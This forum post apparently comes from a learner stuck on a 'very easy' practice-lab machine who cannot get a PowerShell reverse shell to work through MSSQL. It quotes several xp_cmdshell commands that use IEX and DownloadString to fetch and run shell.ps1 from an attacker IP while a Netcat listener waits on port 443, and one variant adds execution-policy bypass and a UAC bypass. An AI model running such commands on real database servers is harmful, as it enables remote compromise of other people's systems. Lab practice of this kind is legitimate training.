Hello everyone,
I am hoping someone can point me in the right direction here because the instructions in the walkthrough do not work.
I am trying to execute the command to pull down shell.ps1. I have the Python HTTP server running, as well as Netcat on port 443.
When I try to use any form of the PowerShell’s DownloadString command, the mssqlclient.py console will either hang, get into an unusable state where entering any command results in it not being executed (just get a new line), or an error from PowerShell. I once got it to give an error about antivirus, however I cannot seem to reproduce that.
I have tried the following:
-From the walkthrough
- xp_cmdshell "powershell “IEX (New-ObjectNet.WebClient).DownloadString("http://[MY_IP]/shell.ps1");”
Result: no connection to Python webserver, console goes into state where it won’t execute commands
-Adding a missing double quote at the end
xp_cmdshell “powershell “IEX (New-Object Net.WebClient).DownloadString("http://[MY_IP]/shell.ps1");””
Result: no connection to Python webserver, console goes into state where it won’t execute commands
Another command I found for downloading with PowerShell
xp_cmdshell powershell.exe -exec bypass -C “IEX (New-Object Net.WebClient).DownloadString("http://[MY_IP]/shell.ps1");Invoke-BypassUAC -Command "start powershell.exe"”
Result: no connection to Python webserver, console goes into state where it won’t execute commands
I have also tried different combinations of single quotes, double quotes, extra slashes (\ in place of a single ) . I have also tried resetting the machine, enabling/disabling ufw on my Kali virtual machine, and verified my IP address is correct. NOTHING WORKS.
I have had success using this command:
xp_cmdshell powershell -command {“IEX echo 1”}
Result:
IEX echo 1
NULL
And by success, I mean the mssqlclient.py console is still usable after executing the command. If I try replacing the echo 1 part with some form of Web-Client/Download-String I get the problems I have already described.
I am at a loss as to how to go forward here. This is supposed to be a “very easy” machine, yet I do not see what I am missing. Am I wrong in assuming that there should be a direct logical path and the walkthrough document should provide this? Is there some other part of this challenge that I lack the experience to know?